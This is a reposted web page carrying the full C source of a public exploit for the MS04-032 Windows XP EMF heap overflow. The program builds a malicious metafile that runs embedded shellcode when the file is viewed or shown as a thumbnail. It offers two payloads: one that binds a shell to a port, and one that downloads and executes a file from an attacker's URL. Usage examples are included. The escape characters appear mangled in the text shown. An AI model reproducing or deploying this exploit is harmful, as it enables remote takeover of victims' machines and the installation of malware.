您的位置:首页 > 其它

[EXPL] (MS04-032) Microsoft Windows XP Metafile (.emf) Heap

2004-10-27 16:50 405 查看
---snip---
/* HOD-ms04032-emf-expl2.c:
*
* (MS04-032) Microsoft Windows XP Metafile (.emf) Heap
Overflow
*
* Exploit version 0.2 (PUBLIC) coded by
*
*
* .::[ houseofdabus ]::.
*
*
* [at inbox dot ru]
* -------------------------------------------------------------------
* About WMF/EMF:
* Windows Metafile (WMF) and Enhanced Windows
Metafile (EMF) formats
* are vector files that can contain a raster image...
*
* -------------------------------------------------------------------
* The vulnerability will be triggered by either viewing a
malicious
* file or by navigating to a directory, which contains a
malicious
* file and displays it as a thumbnail.
*
* Graphics Rendering Engine Vulnerability -
CAN-2004-0209
* -------------------------------------------------------------------
* Tested on:
* - Internet Explorer 6.0 (SP1) (iexplore.exe)
* - Explorer (explorer.exe)
* - Windows XP SP1
*
* -------------------------------------------------------------------
* Compile:
* Win32/VC++ : cl HOD-ms04032-emf-expl.c
* Win32/cygwin: gcc HOD-ms04032-emf-expl.c
-lws2_32.lib
* Linux : gcc -o HOD-ms04032-emf-expl
HOD-ms04032-emf-expl.c
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
* HOD.exe <file> <shellcode> <bind/connectback port>
[connectback IP]
*
* Shellcode:
* 1 - Portbind shellcode
* 2 - Connectback shellcode
*
* -------------------------------------------------------------------
* Examples:
*
* C:/>HOD-ms04032-emf-expl.exe expl.emf 1 7777
*
* C:/>HOD-ms04032-emf-expl.exe expl.emf 2
http://host/file.exe
*
* -------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for
educational
* purposes and testing by authorized individuals with
permission to
* do so.
*
*/

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#include <winsock2.h>

#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif

#include <windows.h>

unsigned char emfheader[] =
"/x01/x00/x00/x00/x40/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x20/x00/x00/x00/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x4c/x03/x00/x00/x4c/x03/x00/x00/x20/x45/x4d/x46/x00/x00/x01/x00"
"/x40/x00/x00/x00/x0b/x00/x00/x00/x0a/x00/x00/x00/xff/xff/x00/x00"

"/xEB/x12/x90/x90/x90/x90/x90/x90"
"/x9e/x5c/x05/x78" /* call [edi+0x74h] - rpcrt4.dll */
"/xb4/x73/xed/x77"; /* Top SEH - XP SP1 */

unsigned char portbind_sc[] =
"/x90/x90/x90/x90/x90/x90/x90/x90"

"/xeb/x03/x5d/xeb/x05/xe8/xf8/xff"
"/xff/xff/x8b/xc5/x83/xc0/x11/x33/xc9/x66/xb9/xc9/x01/x80/x30/x88"
"/x40/xe2/xfa/xdd/x03/x64/x03/x7c/x09/x64/x08/x88/x88/x88/x60/xc4"
"/x89/x88/x88/x01/xce/x74/x77/xfe/x74/xe0/x06/xc6/x86/x64/x60/xd9"
"/x89/x88/x88/x01/xce/x4e/xe0/xbb/xba/x88/x88/xe0/xff/xfb/xba/xd7"
"/xdc/x77/xde/x4e/x01/xce/x70/x77/xfe/x74/xe0/x25/x51/x8d/x46/x60"
"/xb8/x89/x88/x88/x01/xce/x5a/x77/xfe/x74/xe0/xfa/x76/x3b/x9e/x60"
"/xa8/x89/x88/x88/x01/xce/x46/x77/xfe/x74/xe0/x67/x46/x68/xe8/x60"
"/x98/x89/x88/x88/x01/xce/x42/x77/xfe/x70/xe0/x43/x65/x74/xb3/x60"
"/x88/x89/x88/x88/x01/xce/x7c/x77/xfe/x70/xe0/x51/x81/x7d/x25/x60"
"/x78/x88/x88/x88/x01/xce/x78/x77/xfe/x70/xe0/x2c/x92/xf8/x4f/x60"
"/x68/x88/x88/x88/x01/xce/x64/x77/xfe/x70/xe0/x2c/x25/xa6/x61/x60"
"/x58/x88/x88/x88/x01/xce/x60/x77/xfe/x70/xe0/x6d/xc1/x0e/xc1/x60"
"/x48/x88/x88/x88/x01/xce/x6a/x77/xfe/x70/xe0/x6f/xf1/x4e/xf1/x60"
"/x38/x88/x88/x88/x01/xce/x5e/xbb/x77/x09/x64/x7c/x89/x88/x88/xdc"
"/xe0/x89/x89/x88/x88/x77/xde/x7c/xd8/xd8/xd8/xd8/xc8/xd8/xc8/xd8"
"/x77/xde/x78/x03/x50/xdf/xdf/xe0/x8a/x88/xAB/x6F/x03/x44/xe2/x9e"
"/xd9/xdb/x77/xde/x64/xdf/xdb/x77/xde/x60/xbb/x77/xdf/xd9/xdb/x77"
"/xde/x6a/x03/x58/x01/xce/x36/xe0/xeb/xe5/xec/x88/x01/xee/x4a/x0b"
"/x4c/x24/x05/xb4/xac/xbb/x48/xbb/x41/x08/x49/x9d/x23/x6a/x75/x4e"
"/xcc/xac/x98/xcc/x76/xcc/xac/xb5/x01/xdc/xac/xc0/x01/xdc/xac/xc4"
"/x01/xdc/xac/xd8/x05/xcc/xac/x98/xdc/xd8/xd9/xd9/xd9/xc9/xd9/xc1"
"/xd9/xd9/x77/xfe/x4a/xd9/x77/xde/x46/x03/x44/xe2/x77/x77/xb9/x77"
"/xde/x5a/x03/x40/x77/xfe/x36/x77/xde/x5e/x63/x16/x77/xde/x9c/xde"
"/xec/x29/xb8/x88/x88/x88/x03/xc8/x84/x03/xf8/x94/x25/x03/xc8/x80"
"/xd6/x4a/x8c/x88/xdb/xdd/xde/xdf/x03/xe4/xac/x90/x03/xcd/xb4/x03"
"/xdc/x8d/xf0/x8b/x5d/x03/xc2/x90/x03/xd2/xa8/x8b/x55/x6b/xba/xc1"
"/x03/xbc/x03/x8b/x7d/xbb/x77/x74/xbb/x48/x24/xb2/x4c/xfc/x8f/x49"
"/x47/x85/x8b/x70/x63/x7a/xb3/xf4/xac/x9c/xfd/x69/x03/xd2/xac/x8b"
"/x55/xee/x03/x84/xc3/x03/xd2/x94/x8b/x55/x03/x8c/x03/x8b/x4d/x63"
"/x8a/xbb/x48/x03/x5d/xd7/xd6/xd5/xd3/x4a/x8c/x88";

unsigned char download_sc[]=
"/x90/x90/x90/x90/x90/x90/x90/x90"

"/xEB/x0F/x58/x80/x30/x17/x40/x81/x38/x6D/x30/x30/x21/x75/xF4"
"/xEB/x05/xE8/xEC/xFF/xFF/xFF/xFE/x94/x16/x17/x17/x4A/x42/x26"
"/xCC/x73/x9C/x14/x57/x84/x9C/x54/xE8/x57/x62/xEE/x9C/x44/x14"
"/x71/x26/xC5/x71/xAF/x17/x07/x71/x96/x2D/x5A/x4D/x63/x10/x3E"
"/xD5/xFE/xE5/xE8/xE8/xE8/x9E/xC4/x9C/x6D/x2B/x16/xC0/x14/x48"
"/x6F/x9C/x5C/x0F/x9C/x64/x37/x9C/x6C/x33/x16/xC1/x16/xC0/xEB"
"/xBA/x16/xC7/x81/x90/xEA/x46/x26/xDE/x97/xD6/x18/xE4/xB1/x65"
"/x1D/x81/x4E/x90/xEA/x63/x05/x50/x50/xF5/xF1/xA9/x18/x17/x17"
"/x17/x3E/xD9/x3E/xE0/xFE/xFF/xE8/xE8/xE8/x26/xD7/x71/x9C/x10"
"/xD6/xF7/x15/x9C/x64/x0B/x16/xC1/x16/xD1/xBA/x16/xC7/x9E/xD1"
"/x9E/xC0/x4A/x9A/x92/xB7/x17/x17/x17/x57/x97/x2F/x16/x62/xED"
"/xD1/x17/x17/x9A/x92/x0B/x17/x17/x17/x47/x40/xE8/xC1/x7F/x13"
"/x17/x17/x17/x7F/x17/x07/x17/x17/x7F/x68/x81/x8F/x17/x7F/x17"
"/x17/x17/x17/xE8/xC7/x9E/x92/x9A/x17/x17/x17/x9A/x92/x18/x17"
"/x17/x17/x47/x40/xE8/xC1/x40/x9A/x9A/x42/x17/x17/x17/x46/xE8"
"/xC7/x9E/xD0/x9A/x92/x4A/x17/x17/x17/x47/x40/xE8/xC1/x26/xDE"
"/x46/x46/x46/x46/x46/xE8/xC7/x9E/xD4/x9A/x92/x7C/x17/x17/x17"
"/x47/x40/xE8/xC1/x26/xDE/x46/x46/x46/x46/x9A/x82/xB6/x17/x17"
"/x17/x45/x44/xE8/xC7/x9E/xD4/x9A/x92/x6B/x17/x17/x17/x47/x40"
"/xE8/xC1/x9A/x9A/x86/x17/x17/x17/x46/x7F/x68/x81/x8F/x17/xE8"
"/xA2/x9A/x17/x17/x17/x44/xE8/xC7/x48/x9A/x92/x3E/x17/x17/x17"
"/x47/x40/xE8/xC1/x7F/x17/x17/x17/x17/x9A/x8A/x82/x17/x17/x17"
"/x44/xE8/xC7/x9E/xD4/x9A/x92/x26/x17/x17/x17/x47/x40/xE8/xC1"
"/xE8/xA2/x86/x17/x17/x17/xE8/xA2/x9A/x17/x17/x17/x44/xE8/xC7"
"/x9A/x92/x2E/x17/x17/x17/x47/x40/xE8/xC1/x44/xE8/xC7/x9A/x92"
"/x56/x17/x17/x17/x47/x40/xE8/xC1/x7F/x12/x17/x17/x17/x9A/x9A"
"/x82/x17/x17/x17/x46/xE8/xC7/x9A/x92/x5E/x17/x17/x17/x47/x40"
"/xE8/xC1/x7F/x17/x17/x17/x17/xE8/xC7/xFF/x6F/xE9/xE8/xE8/x50"
"/x72/x63/x47/x65/x78/x74/x56/x73/x73/x65/x72/x64/x64/x17/x5B"
"/x78/x76/x73/x5B/x7E/x75/x65/x76/x65/x6E/x56/x17/x41/x7E/x65"
"/x63/x62/x76/x7B/x56/x7B/x7B/x78/x74/x17/x48/x7B/x74/x65/x72"
"/x76/x63/x17/x48/x7B/x60/x65/x7E/x63/x72/x17/x48/x7B/x74/x7B"
"/x78/x64/x72/x17/x40/x7E/x79/x52/x6F/x72/x74/x17/x52/x6F/x7E"
"/x63/x47/x65/x78/x74/x72/x64/x64/x17/x40/x7E/x79/x5E/x79/x72"
"/x63/x17/x5E/x79/x63/x72/x65/x79/x72/x63/x58/x67/x72/x79/x56"
"/x17/x5E/x79/x63/x72/x65/x79/x72/x63/x58/x67/x72/x79/x42/x65"
"/x7B/x56/x17/x5E/x79/x63/x72/x65/x79/x72/x63/x45/x72/x76/x73"
"/x51/x7E/x7B/x72/x17/x17/x17/x17/x17/x17/x17/x17/x17/x7A/x27"
"/x27/x39/x72/x6F/x72/x17""HOD""/x21";

unsigned char endoffile[] = "/x00/x00/x00/x00";

void
usage(char *prog)
{
printf("Usage:/n");
printf("%s <file> <shellcode> <bindport / url>/n", prog);
printf("/nShellcode:/n");
printf(" 1 - Portbind shellcode/n");
printf(" 2 - Download & exec shellcode/n/n");
exit(0);
}

int
main(int argc, char **argv)
{
char endofurl = '/x01';
unsigned short port;
int sc;
FILE *fp;

printf("/n(MS04-032) Microsoft Windows XP Metafile
(.emf) Heap Overflow/n/n");
printf("--- Coded by .::[ houseofdabus ]::. ---/n/n");

if (argc < 4) usage(argv[0]);

sc = atoi(argv[2]);
if ((sc > 2) || (sc < 1)) usage(argv[0]);

fp = fopen(argv[1], "wb");
if (fp == NULL) {
printf("[-] error: can/'t create file: %s/n", argv[1]);
exit(0);
}

/* header */
fwrite(emfheader, 1, sizeof(emfheader)-1, fp);

printf("[*] Shellcode: ");
if (sc == 1) {
port = atoi(argv[3]);
printf("Portbind, port = %u/n", port);
port = htons(port^(unsigned short)0x8888);
memcpy(portbind_sc+266, &port, 2);
fwrite(portbind_sc, 1, sizeof(portbind_sc)-1, fp);
fwrite(endoffile, 1, 4, fp);
}
else {
printf("Download & exec, url = %s/n", argv[3]);
fwrite(download_sc, 1, sizeof(download_sc)-1,
fp);
fwrite(argv[3], 1, strlen(argv[3]), fp);
fwrite(&endofurl, 1, 1, fp);
fwrite(endoffile, 1, 4, fp);
}

printf("[+] Ok/n");
fclose(fp);

return 0;
}

---snip---
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航